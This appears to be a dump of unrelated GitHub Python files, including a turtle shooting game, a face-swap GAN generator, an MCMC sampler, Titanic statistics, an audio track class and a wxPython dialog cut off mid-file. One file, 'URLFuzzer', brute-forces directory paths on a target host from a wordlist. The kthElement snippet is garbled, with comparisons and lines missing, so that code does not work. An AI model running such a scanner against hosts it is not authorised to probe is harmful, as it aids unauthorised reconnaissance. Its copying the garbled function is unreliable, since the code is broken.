math.sqrt(math.pow(p2.ycor()-p1.ycor(),2))\n if distance < 13:\n return True\n\n\n#Key controls for player 1\nwindow.listen()\nwindow.onkeypress(player_1_up, \"w\")\nwindow.onkeypress(player_1_down, \"s\")\nwindow.onkeypress(shoot_bullet, \"space\")\n\n#Key controls for player 2\nwindow.listen()\nwindow.onkeypress(player_2_up, \"Up\")\nwindow.onkeypress(player_2_down, \"Down\")\nwindow.onkeypress(shoot_bullet_2, \"p\")\n\nwhile True:\n window.update()\n #Player boundaries\n if player_1.ycor() > 248:\n player_1.goto(-350, 248)\n if player_1.ycor() < -248:\n player_1.goto(-350, -248)\n if player_2.ycor() > 248:\n player_2.goto(350, 248)\n if player_2.ycor() < -248:\n player_2.goto(350, -248)\n #Move the bullet for player 1\n x = bullet.xcor()\n x += bulletspeed\n bullet.setx(x)\n\n #Check to see if the bullet has gone off the boundary.\n if bullet.xcor() > 355:\n bullet.hideturtle()\n bulletcondition = \"ready to shoot\"\n if bullet_2.xcor() < -355:\n bullet_2.hideturtle()\n bullet_2condition = \"ready to shoot\"\n\n\n #Bullet 2\n p = bullet_2.xcor()\n p += bullet_2speed\n bullet_2.setx(p)\n\n\n\n if bulletCollision(bullet, player_2):\n #Reset the bullet\n bullet.hideturtle()\n bulletcondition = \"ready to shoot\"\n bullet.setposition(360,0)\n #Reset player 2\n player_2.setposition(350, 0)\n score_1 += 1\n score.clear()\n score.write(\"Player 1: {} Player 2: {}\".format(score_1, score_2), align = \"center\", font = (\"Impact\", 28, \"normal\"))\n \n\n if bulletCollision(bullet_2, player_1):\n #Reset the bullet\n bullet_2.hideturtle()\n bullet_2condition = \"ready to shoot\"\n bullet_2.setposition(-340,0)\n #Reset player 2\n player_1.setposition(-350, 0)\n score_2 += 1\n score.clear()\n score.write(\"Player 1: {} Player 2: {}\".format(score_1, score_2), align = \"center\", font = (\"Impact\", 28, \"normal\"))\n\n if score_1 == 10:\n player_1.hideturtle();\n player_2.hideturtle();\n window.listen()\n player_1.setposition(1000, 1000)\n player_2.setposition(1100 , 1000)\n win_1 = turtle.Turtle()\n win_1.speed(0)\n win_1.color(\"white\")\n win_1.penup()\n win_1.hideturtle()\n win_1.goto(0, 0)\n win_1.write(\"Player 1 is the winner\", align = \"center\", font = (\"Impact\", 28, \"normal\"))\n GG_1 = turtle.Turtle()\n GG_1.speed(0)\n GG_1.color(\"yellow\")\n GG_1.penup()\n GG_1.hideturtle()\n GG_1.goto(0, -175)\n GG_1.write(\"Good Game\", align = \"center\", font = (\"Impact\", 36, \"bold\"))\n \n\n if score_2 == 10:\n player_1.hideturtle();\n player_2.hideturtle();\n window.listen()\n player_1.setposition(1000, 1000)\n player_2.setposition(1100 , 1000)\n win_2 = turtle.Turtle()\n win_2.speed(0)\n win_2.color(\"white\")\n win_2.penup()\n win_2.hideturtle()\n win_2.goto(0, 0)\n win_2.write(\"Player 2 is the winner\", align = \"center\", font = (\"Impact\", 28, \"normal\"))\n GG_2 = turtle.Turtle()\n GG_2.speed(0)\n GG_2.color(\"green\")\n GG_2.penup()\n GG_2.hideturtle()\n GG_2.goto(0, -175)\n GG_2.write(\"Good Game\", align = \"center\", font = (\"Impact\", 36, \"bold\"))\n \n","repo_name":"Sukhpreet0927/my-attacking-two-player-game","sub_path":"Attacking game modified.py","file_name":"Attacking game modified.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23102307706","text":"import requests\nimport sys\n\nbanner = \"\"\"\n\nU U RRRR L FFFF \nU U R R L F \nU U RRRR L FFF u u zz zz eee rrr \nU U R R L F u u z z e e r \n UUU R RR LLLL F uuu zz zz ee r \n \n \n\"\"\"\n\ndef fuzzing(host, files):\n\ttry:\n\t\tf = open(files, \"r\", encoding=\"utf-8\")\n\n\t\tfor i in f:\n\t\t\tscan = host+i\n\t\t\tscan = scan.rstrip()\n\t\t\tscan += \"/\"\n\t\t\t\n\t\t\t# send requests to test resposne\n\t\t\tr = requests.get(scan)\n\t\t\tif r.status_code == 200:\n\t\t\t\tprint(\"Found 200 \", scan)\n\t\t\telif r.status_code == 403:\n\t\t\t\tprint(\"Forbidden 403 \", scan)\n\t\t\telse:\n\t\t\t\tpass\n\texcept KeyboardInterrupt:\n\t\t\tprint(\"Exit\")\n\nclass main():\n\tprint(banner)\n\tif len(sys.argv) != 3:\n\t\tprint(\"Usage : \", sys.argv[0], \" \")\n\t\tsys.exit()\n\telse:\n\t\tfuzzing(sys.argv[1], sys.argv[2])\n","repo_name":"DedSecCyber/URLFuzzer","sub_path":"urlfuzzer.py","file_name":"urlfuzzer.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19395743261","text":"import torch\nimport torch.nn as nn\nimport torchvision\nclass DeformConv(nn.Module):\n def __init__(self, input_channels, output_channels, kernel_size, stride=1, padding=0, bias=False, *args, **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.kernel_size = kernel_size if isinstance(kernel_size, tuple) else (kernel_size, kernel_size)\n self.stride = stride if isinstance(stride, tuple) else (stride, stride)\n self.padding = padding if isinstance(padding, tuple) else (padding, padding)\n self.bias = bias\n self.conv_offset = nn.Conv2d(input_channels, 2*self.kernel_size[0]*self.kernel_size[1], kernel_size=self.kernel_size, stride=self.stride, padding=self.padding, bias=bias)\n self.deform_conv = torchvision.ops.deform_conv.DeformConv2d(input_channels, output_channels, kernel_size=self.kernel_size, stride=self.stride, padding=self.padding, bias=bias)\n\n\n def forward(self, input):\n offsets = self.conv_offset(input)\n return self.deform_conv(input, offsets)\n\nclass InstanceNorm(nn.Module):\n def __init__(self, epsilon=1e-8):\n \"\"\"\n @notice: avoid in-place ops.\n https://discuss.pytorch.org/t/encounter-the-runtimeerror-one-of-the-variables-needed-for-gradient-computation-has-been-modified-by-an-inplace-operation/836/3\n \"\"\"\n super(InstanceNorm, self).__init__()\n self.epsilon = epsilon\n\n def forward(self, x):\n x = x - torch.mean(x, (2, 3), True)\n tmp = torch.mul(x, x) # or x ** 2\n tmp = torch.rsqrt(torch.mean(tmp, (2, 3), True) + self.epsilon)\n return x * tmp\n\nclass ApplyStyle(nn.Module):\n \"\"\"\n @ref: https://github.com/lernapparat/lernapparat/blob/master/style_gan/pytorch_style_gan.ipynb\n \"\"\"\n def __init__(self, latent_size, channels):\n super(ApplyStyle, self).__init__()\n self.linear = nn.Linear(latent_size, channels * 2)\n\n def forward(self, x, latent):\n style = self.linear(latent) # style => [batch_size, n_channels*2]\n shape = [-1, 2, x.size(1), 1, 1]\n style = style.view(shape) # [batch_size, 2, n_channels, ...]\n #x = x * (style[:, 0] + 1.) + style[:, 1]\n x = x * (style[:, 0] * 1 + 1.) + style[:, 1] * 1\n return x\n\n\n\n\nclass Generator_Adain_Upsample(nn.Module):\n def __init__(self, input_nc, output_nc, latent_size, n_blocks=6, deep=False,\n norm_layer=nn.BatchNorm2d,\n padding_type='reflect'):\n \n super(Generator_Adain_Upsample, self).__init__()\n assert (n_blocks >= 0)\n activation = nn.ReLU(True)\n \n self.deep = deep\n \n self.first_layer = nn.Sequential(nn.ReflectionPad2d(3), nn.Conv2d(input_nc, 64, kernel_size=7, padding=0),\n norm_layer(64), activation)\n ### downsample\n self.down1 = nn.Sequential(nn.Conv2d(64, 128, kernel_size=3, stride=2, padding=1),\n norm_layer(128), activation)\n self.down2 = nn.Sequential(nn.Conv2d(128, 256, kernel_size=3, stride=2, padding=1),\n norm_layer(256), activation)\n self.down3 = nn.Sequential(nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1),\n norm_layer(512), activation)\n \n \n\n if self.deep:\n self.down4 = nn.Sequential(nn.Conv2d(512, 512, kernel_size=3, stride=2, padding=1),\n norm_layer(512), activation)\n\n ### resnet blocks\n BN = []\n for i in range(n_blocks):\n BN += [\n ResnetBlock_Adain(512, latent_size=latent_size, padding_type=padding_type, activation=activation)]\n self.BottleNeck = nn.Sequential(*BN)\n\n if self.deep:\n self.up4 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(512, 512, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(512), activation\n )\n self.up3 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(256), activation\n )\n self.up2 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(256, 128, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(128), activation\n )\n self.up1 = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64), activation\n )\n\n self.last_layer = nn.Sequential(nn.ReflectionPad2d(3), nn.Conv2d(64, output_nc, kernel_size=7, padding=0))\n\n def forward(self, input, dlatents):\n x = input # 3*224*224\n\n skip1 = self.first_layer(x)\n skip2 = self.down1(skip1)\n skip3 = self.down2(skip2)\n if self.deep:\n skip4 = self.down3(skip3)\n x = self.down4(skip4)\n else:\n x = self.down3(skip3)\n bot = []\n bot.append(x)\n features = []\n for i in range(len(self.BottleNeck)):\n x = self.BottleNeck[i](x, dlatents)\n bot.append(x)\n\n if self.deep:\n x = self.up4(x)\n features.append(x)\n x = self.up3(x)\n features.append(x)\n x = self.up2(x)\n features.append(x)\n x = self.up1(x)\n features.append(x)\n x = self.last_layer(x)\n # x = (x + 1) / 2\n\n # return x, bot, features, dlatents\n return x\n\nclass ResnetBlock_Adain(nn.Module):\n def __init__(self, dim, latent_size, padding_type, activation=nn.ReLU(True)):\n super(ResnetBlock_Adain, self).__init__()\n\n p = 0\n conv1 = []\n if padding_type == 'reflect':\n conv1 += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv1 += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv1 += [nn.Conv2d(dim, dim, kernel_size=3, padding = p), InstanceNorm()]\n self.conv1 = nn.Sequential(*conv1)\n self.style1 = ApplyStyle(latent_size, dim)\n self.act1 = activation\n\n p = 0\n conv2 = []\n if padding_type == 'reflect':\n conv2 += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv2 += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv2 += [nn.Conv2d(dim, dim, kernel_size=3, padding=p), InstanceNorm()]\n self.conv2 = nn.Sequential(*conv2)\n self.style2 = ApplyStyle(latent_size, dim)\n\n\n def forward(self, x, dlatents_in_slice):\n y = self.conv1(x)\n y = self.style1(y, dlatents_in_slice)\n y = self.act1(y)\n y = self.conv2(y)\n y = self.style2(y, dlatents_in_slice)\n out = x + y\n return out\n\n\nclass AADBlock(nn.Module):\n def __init__(self,h_inchannel, z_inchannel, z_id_size=512) -> None:\n \n \"\"\"\n This block will not change the size of the input, but h_in.shape[-2:] must be equal to z_att.shape[-2:], and the output channels is h_inchannel\n z_inchannel is the number of channels of the input z_att\n \"\"\"\n \n super().__init__()\n self.norm = nn.InstanceNorm2d(h_inchannel)\n self.conv_f = nn.Conv2d(h_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.fc_1 = nn.Linear(z_id_size, h_inchannel)\n self.fc_2 = nn.Linear(z_id_size, h_inchannel)\n self.conv1 = nn.Conv2d(z_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(z_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.sigmoid = nn.Sigmoid()\n \n \n def forward(self,h_in, z_att, z_id):\n h_bar = self.norm(h_in)\n m = self.sigmoid(self.conv_f(h_bar))\n r_id = self.fc_1(z_id).unsqueeze(-1).unsqueeze(-1).expand_as(h_in)# [batch_size, h_inchannel, 1, 1]->[batch_size, h_inchannel, h, w]\n beta_id = self.fc_2(z_id).unsqueeze(-1).unsqueeze(-1).expand_as(h_in)\n i = r_id*h_bar + beta_id\n r_att = self.conv1(z_att)\n beta_att = self.conv2(z_att)\n a = r_att * h_bar + beta_att\n h_out = (1-m)*a + m*i\n return h_out\n \nclass AADResBlock(nn.Module):\n def __init__(self,h_inchannel, z_inchannel, latent_size=512) -> None:\n super().__init__()\n \n self.add1 = AADBlock(h_inchannel, z_inchannel, z_id_size=latent_size)\n self.act = nn.LeakyReLU(0.2,True)\n self.conv1 = nn.Conv2d(h_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.add2 = AADBlock(h_inchannel, z_inchannel, z_id_size=latent_size)\n self.conv2 = nn.Conv2d(h_inchannel, h_inchannel, kernel_size=3, stride=1, padding=1)\n self.norm = nn.InstanceNorm2d(h_inchannel)\n \n def forward(self, h_in, z_att, z_id):\n x1 = self.add1(h_in, z_att, z_id)\n x1 = self.act(x1)\n x1 = self.conv1(x1)\n x1 = self.norm(x1)\n x1 = self.add2(x1, z_att, z_id)\n x1 = self.act(x1)\n x1 = self.conv2(x1)\n return x1 + h_in\n \n \n# def make_layer(h_inchannel,z_inchannel,latent_size,init_AAD_layer=False):\n# if init_AAD_layer:\n# return AADResBlock(h_inchannel,z_inchannel,latent_size=latent_size)\n \nclass simplifiedGenerator(nn.Module):\n def __init__(self,input_layers = 5, output_layers= 5, latent_size=512, n_blocks=6,\n norm_layer=nn.InstanceNorm2d,deep=True,\n padding_type='reflect',init_channels=32,kernel_type=\"ordinary\") -> None:\n super().__init__()\n assert (n_blocks >= 0)\n # assert (input_layers <=5)\n self.deep = deep\n activation = nn.LeakyReLU(0.2,True)\n assert kernel_type in [\"ordinary\",\"deform\"]\n Conv = nn.Conv2d if kernel_type==\"ordinary\" else DeformConv\n \n self.n_iteration = n_blocks//(input_layers-2) if input_layers>2 else 0\n \n self.first_layer = nn.Sequential(nn.ReflectionPad2d(3), Conv(3, init_channels, kernel_size=7, padding=0),\n norm_layer(init_channels), activation)\n \n self.down = nn.ModuleDict()\n for i in range(3):\n self.down[f'layer_{i}'] = nn.Sequential(Conv(init_channels*(2**i), init_channels*(2**(i+1)), kernel_size=3, stride=2, padding=1),\n norm_layer(init_channels*(2**(i+1))), activation)\n if deep:\n self.down[f'layer_{3}'] = nn.Sequential(Conv(init_channels*(2**3), init_channels*(2**3), kernel_size=3, stride=2, padding=1),\n norm_layer(init_channels*(2**3)), activation)\n else:\n self.down[f'layer_{3}'] = nn.Identity()\n # 没有想好这块stride=1还是2\n for i in range(4,input_layers+1):\n self.down[f'layer_{i}'] = nn.Sequential(Conv(init_channels*(2**3), init_channels*(2**3), kernel_size=3, stride=1, padding=1),\n norm_layer(init_channels*(2**3)), activation)\n \n # BN = []\n # for i in range(n_blocks):\n # BN += [\n # ResnetBlock_Adain(256, latent_size=latent_size, padding_type=padding_type, activation=activation)]\n # self.BottleNeck = nn.Sequential(*BN)\n self.aads = nn.ModuleDict()\n for i in range(self.n_iteration*(input_layers-2)):\n #\n self.aads.add_module(f'layer_{i}',AADResBlock(init_channels*(2**3),init_channels*(2**3),latent_size=latent_size))\n \n \n self.up = nn.ModuleDict()\n # for i in range(4,output_layers):\n # self.up[f'layer_{i}'] = nn.Sequential(\n # # nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n # Conv(init_channels*(2**3),init_channels*(2**3) , kernel_size=3, stride=1, padding=1),\n # nn.InstanceNorm2d(init_channels*(2**3)), activation\n # )\n if deep:\n self.up[f'layer_{3}'] = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n Conv(init_channels*(2**3),init_channels*(2**3) , kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm2d(init_channels*(2**3)), activation\n )\n for i in range(3):\n self.up[f'layer_{i}'] = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear',align_corners=False),\n Conv(init_channels*(2**(i+1)), init_channels*(2**i), kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm2d(init_channels*(2**i)), activation\n )\n self.last_layer = nn.Sequential(nn.ReflectionPad2d(3), Conv(init_channels, 3, kernel_size=7, padding=0))\n self.input_layers = input_layers\n self.output_layers = output_layers\n def forward(self, x, latents):\n x = self.first_layer(x)\n x_attrs = []\n for i in range(len(self.down)):\n # deep会额外进行一次下采样,那么此时我应该拿\n \n x = self.down[f'layer_{i}'](x)\n if i>=self.input_layers-2 and i>=2+self.deep:\n x_attrs.append(x)\n # for i in range(len(self.BottleNeck)):\n # x = self.BottleNeck[i](x, latents)\n \n for i in range(self.n_iteration):\n for j in range(self.input_layers-2):\n x = self.aads[f'layer_{i*(self.input_layers-2)+j}'](x,x_attrs[i],latents)\n \n \n for i in reversed(range(4 if self.deep else 3)):\n x = self.up[f'layer_{i}'](x)\n x = self.last_layer(x)\n return x\n\n# model = AADBlock(512,256,512)\n# t = torch.randn(1,512,4,4)\n# x = torch.randn(1,256,4,4)\n# l = torch.randn(1,512)\n# print(model(t,x,l).shape)\n# model = simplifiedGenerator(5,5,512,6,deep=False)\n# t = torch.randn(1,3,224,224)\n# l = torch.randn(1,512)\n# print(model(t,l).shape)","repo_name":"TiAmoLip/FaceSwap","sub_path":"models/fs_networks_fix.py","file_name":"fs_networks_fix.py","file_ext":"py","file_size_in_byte":14429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25187958944","text":"#asynchronously plays a logo video while stuff loads\n\nimport thumbyGraphics\nfrom machine import Timer\n\ndata = open(\"/Games/PSdemo/logo.bin\", \"rb\")\nframecount = ord(data.read(1))\nframe = 0\n\ndef drawframe(dummy):\n global frame\n diff = 0\n pos = 0\n while True:\n step = ord(data.read(1))\n pos += step & 127\n if pos >= 360: break #end of screen buffer\n if step & 128: diff = ord(data.read(1))\n thumbyGraphics.display.display.buffer[pos] ^= diff\n frame += 1\n if frame >= framecount:\n frametimer.deinit()\n data.close()\n thumbyGraphics.display.update()\n\nframetimer = Timer()\n\ndef start():\n frametimer.init(freq=30, mode=Timer.PERIODIC, callback=drawframe)\n\ndef finish():\n while frame < framecount: pass\n","repo_name":"TinyCircuits/TinyCircuits-Thumby-Games","sub_path":"PSdemo/logo.py","file_name":"logo.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"52"} +{"seq_id":"71854580645","text":"\"\"\" Run one chain, can be imported by other files\nWe always sample S8, Om\n\"\"\"\n\nimport sys\n\nimport numpy as np\nfrom scipy.optimize import minimize\n\nimport emcee\n\nfrom loglike import LogLike\nfrom settings import S, IDENT\n\nnp.seterr(all='raise') # not sure why we did this originally, keep...\n\ndef logprior (theta) :\n S8, Om = theta\n in_interval = lambda x, t: t[0] <= x <= t[1]\n\n if not in_interval(Om, S['prior']['Om']) :\n return -np.inf\n\n # we have uniform prior in sigma8\n if 's8' in S['prior'] :\n s8 = S8 / np.sqrt(Om/0.3)\n if not in_interval(s8, S['prior']['s8']) :\n return -np.inf\n return -0.5 * np.log(Om)\n\n # we have uniform prior in S_8\n if not in_interval(S8, S['prior']['S8']) :\n return -np.inf\n\n return 0\n\n\ndef logprob (theta, loglike) :\n try :\n lp = logprior(theta)\n if not np.isfinite(lp) :\n return -np.inf\n return lp + loglike(theta)\n except FloatingPointError :\n return -np.inf\n\n\ndef nll (theta, loglike) :\n # this is the optimization objective when finding the starting point\n # NOTE that in this case theta may be either [S8, Om] or [s8, Om]\n t = theta.copy()\n if 's8' in S['prior'] :\n # need to transform to S8\n t[0] *= np.sqrt(t[1]/0.3)\n return -logprob(t, loglike)\n\n\ndef get_init_theta (loglike) :\n ml_theta_start = np.array([0.8, 0.3])\n ml_sln = minimize(nll, ml_theta_start, args=loglike,\n method='Powell',\n bounds=[ S['prior']['S8' if 'S8' in S['prior'] else 's8'], S['prior']['Om'] ])\n if not ml_sln.success :\n print(f'*** Warning: minimization not successful. {ml_sln.message}', file=sys.stderr)\n ml_theta = ml_theta_start\n else :\n ml_theta = ml_sln.x\n\n rng = np.random.default_rng()\n init_theta = ml_theta + rng.normal(0, 1e-2, size=(S['mcmc']['nwalkers'], 2))\n\n # make sure these are all inside the prior (if not we replace by uniform samples)\n lo, hi = [ [p[ii] for p in S['prior'].values()] for ii in range(2) ]\n for ii in range(S['mcmc']['nwalkers']) :\n # use nll here because it is already in terms of the correct amplitude which makes it convenient\n if not np.isfinite(nll(init_theta[ii], loglike)) :\n init_theta[ii, :] = rng.uniform(lo, hi)\n \n # now transform back to S8 if necessary\n if 's8' in S['prior'] :\n init_theta[:, 0] *= np.sqrt(init_theta[:, 1]/0.3)\n ml_theta[0] *= np.sqrt(ml_theta[1]/0.3)\n\n return init_theta, ml_theta\n\n\ndef Sample (obs_case, obs_idx) :\n\n ll = LogLike(obs_case, obs_idx)\n init_theta, ml_theta = get_init_theta(ll)\n assert all(np.isfinite(logprior(t)) for t in init_theta)\n\n # increase the stretch parameter from its default (2) to decrease acceptance rate and correlation time\n sampler = emcee.EnsembleSampler(S['mcmc']['nwalkers'], 2, logprob, args=(ll, ),\n moves=emcee.moves.StretchMove(a=5))\n sampler.run_mcmc(init_theta, (4 if obs_case=='real' else 1) * S['mcmc']['nsteps'], progress=(obs_case=='real'))\n\n kwargs = dict(thin=S['mcmc']['thin'], discard=S['mcmc']['discard'])\n chain = sampler.get_chain(**kwargs)\n lp = sampler.get_log_prob(**kwargs)\n\n try :\n autocorr_times = sampler.get_autocorr_time(discard=S['mcmc']['discard'])\n except emcee.autocorr.AutocorrError :\n autocorr_times = np.full(2, float('nan'))\n\n acceptance_rates = sampler.acceptance_fraction\n\n return dict(chain=chain, lp=lp, autocorr_times=autocorr_times, acceptance_rates=acceptance_rates,\n ml_theta=ml_theta, true_theta=ll.theta_real)\n","repo_name":"leanderthiele/HSC_Y1_kappapdf_production","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43679255493","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef main():\n df = pd.read_csv(\"dataset.csv\")\n survivedCount = 0\n\n survivedMale = 0\n survivedMaleAge = 0\n survivedMaleFare = 0\n\n survivedFemale = 0\n\n for index, row in df.iterrows():\n if row['Survived'] == 1:\n survivedCount += 1\n if row['Sex'] == \"male\":\n survivedMale += 1\n if row['Age'] >= 0:\n survivedMaleAge += row['Age']\n if row['Fare'] > 0:\n survivedMaleFare += row['Fare']\n else:\n survivedFemale += 1\n\n print(f\"There's a total of {survivedCount} people who survived the Titanic.\")\n print(f\"Of which, {survivedMale} are male and {survivedFemale} are female\")\n print(f\"Of the {survivedMale} males that survived, \"\n f\"The average age is {format(survivedMaleAge / survivedMale, '.2f')}, \"\n f\"The average fare is £{format(survivedMaleFare / survivedMale, '.2f')}\")\n\n activities = ['Male Survived', 'Female Survived', 'Died']\n deaths = 891 - (survivedMale + survivedFemale)\n slices = [survivedMale, survivedFemale, deaths]\n colors = ['r', 'g', 'b']\n plt.pie(slices, labels=activities, colors=colors,\n startangle=90, shadow=True, explode=(0.1, 0.1, 0.1),\n radius=1.2, autopct='%1.1f%%')\n\n plt.legend()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ahmedhamedaly/Titanic","sub_path":"TitanicStatistics.py","file_name":"TitanicStatistics.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29159047062","text":"def kthElement(arr1,arr2,n1,n2,k):\r\n if n2r2:\r\n high = cut1-1\r\n else:\r\n low = cut1 +1\r\n\r\n\r\n\r\narr1 = [100, 112, 256, 349, 770]\r\narr2 = [72, 86, 113, 119, 265, 445, 892]\r\nk = 6\r\nprint(kthElement(arr1,arr2,len(arr1),len(arr2),k))\r\n\r\n\r\n# def kthElement(arr1, arr2, k):\r\n\r\n# i = 0\r\n# j = 0\r\n# n1 = len(arr1)\r\n# n2 = len(arr2)\r\n# m1 = -1\r\n# for _ in range(k):\r\n# if iarr2[j]:\r\n# m1 = arr2[j]\r\n# j+=1\r\n# else:\r\n# m1 = arr1[i]\r\n# i+=1\r\n# elif i 0:\n mean = times[index - 1: index + 1].mean()\n if start <= mean:\n index -= 1\n start = index\n\n stop = None if length is None else start + length + 1\n\n times = times[start:stop]\n # initialize audio\n self._audio = Audio(audio,\n sample_rate=self._mix.sample_rate,\n num_channels=self._mix.num_channels,\n start=times[0],\n stop=times[-1],\n gain=volume,\n dtype=np.float_)\n self._disp = self._audio\n # store local times\n self._times = times - times[0]\n self._times.setflags(write=False)\n # initialize other attributes\n self._sample_indeces = round_(self.times * self.audio.sample_rate)\n self._sample_indeces.setflags(write=False)\n\n if automation is not None:\n automation = parse(automation)\n if 'Volume' in automation:\n volume = Volume(self)\n self._audio = volume(automation['Volume'])\n if 'Equalizer' in automation:\n equalizer = Equalizer(self)\n self._audio = equalizer(automation['Equalizer'])\n self._audio.setflags(write=False)\n if self.display_automation:\n self._disp = self._audio\n\n @property\n def initialized(self):\n \"\"\"True iff track has been initialized.\"\"\"\n return hasattr(self, '_audio')\n\n @property\n def audio(self):\n \"\"\"Reference to audio of the track.\"\"\"\n return self._audio\n\n @property\n def display(self):\n \"\"\"Samples to dispaly in the plot.\"\"\"\n if self._disp.num_channels > 1:\n self._disp = self._disp.remix(1)\n return self._disp\n\n @property\n def times(self):\n \"\"\"Reference to local beat positions.\"\"\"\n return self._times\n\n @property\n def sample_indeces(self):\n \"\"\"Reference to local beat sample indeces.\"\"\"\n return self._sample_indeces\n\n @property\n def position(self):\n \"\"\"Global position of the track.\"\"\"\n return self._position\n\n @property\n def num_segments(self):\n \"\"\"Number of segments the track encompasses.\"\"\"\n return self._times.size - 1\n\n @property\n def bpm(self):\n \"\"\"Average tempo in bpm.\"\"\"\n return time_to_bpm(np.diff(self._times).mean())\n\n def to_local(self, index):\n \"\"\"Convert global to local segment index.\"\"\"\n return index - self._position\n\n def to_global(self, index):\n \"\"\"Convert local to global segment index.\"\"\"\n return index + self._position\n\n def length(self, start, stop=None, local=True):\n \"\"\"Calculates the length of the specified segments in seconds.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n float\n The length of the specified segment range in seconds.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n return self._times[stop] - self._times[start]\n\n def num_samples(self, start, stop=None, local=True):\n \"\"\"Calculates the number of samples of the specified segments.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n int\n The number of samples of the specified segment range.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n return self._sample_indeces[stop] - self._sample_indeces[start]\n\n def available(self, start, stop=None, local=True):\n \"\"\"Checks if the specified segments are available.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n bool\n True iff all segments of the specified range are available.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n return self.initialized and 0 <= start and stop <= self.num_segments\n\n def segments(self, start, stop=None, local=True):\n \"\"\"Fetches the specified segments of the track.\n\n Parameters\n ----------\n start : int\n The segment index of the start of the segment range.\n stop : int, optional\n The segment index of the stop of the segment range.\n local : bool, optional\n Flag determining whether local or global indeces are provided.\n\n Returns\n -------\n :class:`Audio`\n The audio to be played in the specified segment range.\n\n \"\"\"\n\n if stop is None:\n stop = start + 1\n if not local:\n start = self.to_local(start)\n stop = self.to_local(stop)\n start_index = self._sample_indeces[start]\n stop_index = self._sample_indeces[stop]\n return self._audio[start_index:stop_index]\n","repo_name":"jakob-nagel/Adapta","sub_path":"adapta/model/data/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17248698154","text":"from random import choice, choices\nimport wx\n\nimport serial.tools.list_ports\nimport os\nfrom sys import platform\nimport re\n\nimport configdata\n\nfrom uiGlobals import IMG_ICON\n\nclass DutConfigDialog(wx.Frame):\n def __init__(self, top, dut):\n wx.Frame.__init__(self,None, size=(360,620))\n\n self.SetBackgroundColour(\"White\")\n self.SetTitle('DUT Config Dialog')\n self.dut = dut\n self.top = top\n\n self.dut_key = list(self.dut.keys())[0]\n self.dut_type = self.dut[self.dut_key][\"interface\"]\n self.dut_settings = self.dut[self.dut_key][self.dut_type]\n \n self.vboxParent = wx.BoxSizer(wx.VERTICAL)\n \n self.InitSelectionType()\n self.InitSerialConfig()\n self.InitTcpConfig()\n self.InitDataToWatch() \n \n self.vboxParent.AddMany([\n (self.vboxRead, 0, wx.EXPAND | wx.ALL, 10),\n (self.vboxSerial, 0, wx.EXPAND | wx.ALL, 10),\n (self.vboxTcp, 0, wx.EXPAND | wx.ALL, 10),\n (self.vboxLog, 0, wx.EXPAND | wx.ALL, 10)\n ])\n\n self.SetSizer(self.vboxParent)\n\n self.cb_list = self.filter_port()\n 